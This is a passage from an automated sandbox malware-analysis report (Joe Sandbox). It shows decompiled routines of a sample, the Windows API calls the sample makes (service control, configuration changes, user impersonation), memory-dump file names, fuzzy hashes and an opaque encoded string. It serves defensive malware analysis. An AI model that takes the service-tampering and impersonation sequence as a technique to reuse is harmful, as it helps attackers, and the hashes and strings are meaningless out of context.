                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 010D36CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
                                                                                                                                                                                                                                            • Instruction ID: 2c918aecab8941edd42efaa1b25861f3cb36b8ff51b8bc4c3f93e1ca00d6e39e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 590184B6A01214BBDB304AAA5C48EEB7ABCFB8AB10F004159BE55E6184D5658540CB71
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E010D65E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010D2B33), ref: 010D6602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 010D6612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 010D6629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 010D6635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
                                                                                                                                                                                                                                            • Instruction ID: 350d4777d784009302cb0baba25f53c697e9720eb24dbe78834dcdf360136711
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6F0F436105250AEE7330A3C88888BBBFDCCF8F19471901EFF8D183101D61B0A468761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D69B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0x10d81f8 = E010D6C70();
                                                                                                                                                                                                                                            				__set_app_type(E010D6FBE(2));
                                                                                                                                                                                                                                            				 *0x10d88a4 =  *0x10d88a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0x10d88a8 =  *0x10d88a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0x10d8528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0x10d851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E010D7000();
                                                                                                                                                                                                                                            				if( *0x10d8000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E010D7000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D71EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010D6FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 010D69C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 010D69D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 010D69E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 010D6A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
                                                                                                                                                                                                                                            • Instruction ID: e9d79926b77dc85f9fdf045a933b12e3c7408e8d0c93c7ec04f942a72490e41e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70F0F274606302CFC778AB3AE50A7283BA1FB04321B10864AECE2862D8CB3F85408B10
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:60.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:28.6%
                                                                                                                                                                                                                                            Total number of Nodes:21
                                                                                                                                                                                                                                            Total number of Limit Nodes:0

                                                                                                                                                                                                                                            Callgraph


                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeConfigService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3849694230-0
                                                                                                                                                                                                                                            • Opcode ID: 5318751bf963e1d4199becdbd6dd24e3568dc0c4fb841f20e99168a92f8dbc81
                                                                                                                                                                                                                                            • Instruction ID: 753a3dda2ac0f793f9253f0e74da2763967724792ae9f50a311b0c0a372a4016
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5318751bf963e1d4199becdbd6dd24e3568dc0c4fb841f20e99168a92f8dbc81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E1A270928A4D4FEB69DF28C84A7F977D1FB58311F10426EEC4EC7291DA74E5818B82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                            • Opcode ID: 1f727483ad23d7027779cac7456524fa9e5ecb4bcc76f74043dedc125c17914b
                                                                                                                                                                                                                                            • Instruction ID: 8d847a8b7f30e3acf091a6bb1f7a5e26825eb9459d351bd36d59c5f609c9fe11
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f727483ad23d7027779cac7456524fa9e5ecb4bcc76f74043dedc125c17914b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34714D70618A4D8FEB69EF28C8597E977E1FF58300F00416AD84EC7291CF78A981CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2216092060-0
                                                                                                                                                                                                                                            • Opcode ID: 8c09ce61d7ec36d0d9d03e54c8871c725b0108171a32be438fbf08df39025fe7
                                                                                                                                                                                                                                            • Instruction ID: 149197b2c04e7c3165959a2c9f0441de5c0e251541f30d95450568b3fc477372
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c09ce61d7ec36d0d9d03e54c8871c725b0108171a32be438fbf08df39025fe7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80A1237191DB884FDB5ADB78D8596F97BE0EF56321F0401BFD089D32A3CA28A806C751
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ControlService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 253159669-0
                                                                                                                                                                                                                                            • Opcode ID: 849ca4ac4a8af9ca13f720632db8c9186dc8e42fad4fbc3eec2d57f471c03ba7
                                                                                                                                                                                                                                            • Instruction ID: be256e1a0ac44f8203a3c423667eb60ce82c09630f4c129bc5ca387313b67adb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 849ca4ac4a8af9ca13f720632db8c9186dc8e42fad4fbc3eec2d57f471c03ba7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F41177191CB484FDB19DB68DC0AAF97FE4EF56321F04416EE089D3152DA74A809CB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3098006287-0
                                                                                                                                                                                                                                            • Opcode ID: f4a0ac8b6eac7513a3bd9e2177e78c95315754add0a1e579646cd2bb5a7af802
                                                                                                                                                                                                                                            • Instruction ID: 7a6bc57de15006f44a5765a15a05cc1e72175f49d566f575d399bf7bbd101295
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4a0ac8b6eac7513a3bd9e2177e78c95315754add0a1e579646cd2bb5a7af802
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57411070514A4D8FEB98EF28C8597A977E1FB68315F10426EE84ED3291DF74E8818B81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 174 7ffbace60b2d-7ffbace60bb8 179 7ffbace60bc2-7ffbace60bc7 174->179 180 7ffbace60bba-7ffbace60bbf 174->180 181 7ffbace60bd1-7ffbace60c08 OpenSCManagerW 179->181 182 7ffbace60bc9-7ffbace60bce 179->182 180->179 183 7ffbace60c10-7ffbace60c2d 181->183 184 7ffbace60c0a 181->184 182->181 184->183
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1889721586-0
                                                                                                                                                                                                                                            • Opcode ID: 1046615745fc46ce21984d668589953389008509efde110b541aa55438508a0e
                                                                                                                                                                                                                                            • Instruction ID: ca7b04ba514ff7c6d560962731711a04763f64d2711aaa129b1efeeab8813324
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1046615745fc46ce21984d668589953389008509efde110b541aa55438508a0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E331A07191CB588FDB29DFA8D8496F9BBE0EB65321F04816FD04AD3252DB70A845CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 185 7ffbace6108a-7ffbace610b3 186 7ffbace610be-7ffbace61152 FindCloseChangeNotification 185->186 187 7ffbace610b5-7ffbace610bd 185->187 191 7ffbace6115a-7ffbace61181 186->191 192 7ffbace61154 186->192 187->186 192->191
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: e2d01c9e65a6419a8dc77552adaf4d690868c3205e01f38761249302d704f5e8
                                                                                                                                                                                                                                            • Instruction ID: 21fd76bb176ade59fca86a80285275b84de0dd72d4d63b4d72a70042a51137a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2d01c9e65a6419a8dc77552adaf4d690868c3205e01f38761249302d704f5e8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5131267090C78C8FDB0ADB68C8197E97FF0EF56320F04029FD089D31A2DA65A856CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 461d5e18da8d9510772ad0267d78681eed26ab470ddde9acddbd8b191234e239
                                                                                                                                                                                                                                            • Instruction ID: be797ff1c690e1b1010d4781df48de84ed22ca8d8590329bc87eac36d317cd33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 461d5e18da8d9510772ad0267d78681eed26ab470ddde9acddbd8b191234e239
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2226A347002158FDB14DB78D4A4A6E7BE6EF89314F2584A9E906CB3A2DF35DC06CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: 8b2272b457eab097f0b20fd9c2959d32ef9746ee1481ec3b2321f65ec21d0782
                                                                                                                                                                                                                                            • Instruction ID: fc8d7bd6ed9d5978aba76fdb01af4ca048420c4a8b536a2c3ee13fcef0be534e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b2272b457eab097f0b20fd9c2959d32ef9746ee1481ec3b2321f65ec21d0782
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27713A30D01308DFCB05EFB8E8648ADBBB6FF8A316B608569E415A7395DF359849CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: ee9400008ef3f300b335c1c37c1bca6a50f3e61f1da559d34f3b227b74c89fa4
                                                                                                                                                                                                                                            • Instruction ID: 0f07a35f63dc61c69126f764ec475e60ee0c9592a398f79519bde081cc9e3f69
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee9400008ef3f300b335c1c37c1bca6a50f3e61f1da559d34f3b227b74c89fa4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C61F530D01308DFCB04EFB8E8588ADBBB6FF8A316B609669E41667394DF359845CB15
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: 4694eae61cf039c7646c25bc3cf3098fb9e5812b8dda463bde64a03a8ee5c1ed
                                                                                                                                                                                                                                            • Instruction ID: b88157c75ac05fe5f2c6983ea7494a6ed7e13b9ff15374770733723a91b4256c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4694eae61cf039c7646c25bc3cf3098fb9e5812b8dda463bde64a03a8ee5c1ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06511630901308DFCB04EFB8E8688ADBBB6FF8A316B60856DE41667394DF359845CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9400116a1688e41b6d8f1e31c17838b901734e1c33c873dd28cf7bea8a962680
                                                                                                                                                                                                                                            • Instruction ID: 240ea43ed31bee14c94611151060fa69e33a1637c9de0bf03511738878cb05a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9400116a1688e41b6d8f1e31c17838b901734e1c33c873dd28cf7bea8a962680
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B113FC78911204EFCB16AB60E950D9DB332FF99306B5084BEDC1137BA9CA3B9952DF11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e016d6d4c00c118d92da873c1cb6a1d18ca33bf0112654883f5d12ada6fe175b
                                                                                                                                                                                                                                            • Instruction ID: 7ca4c3790aaba8f4307833e10a27e605e3436b3252921c6a143e735a7bda583b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e016d6d4c00c118d92da873c1cb6a1d18ca33bf0112654883f5d12ada6fe175b
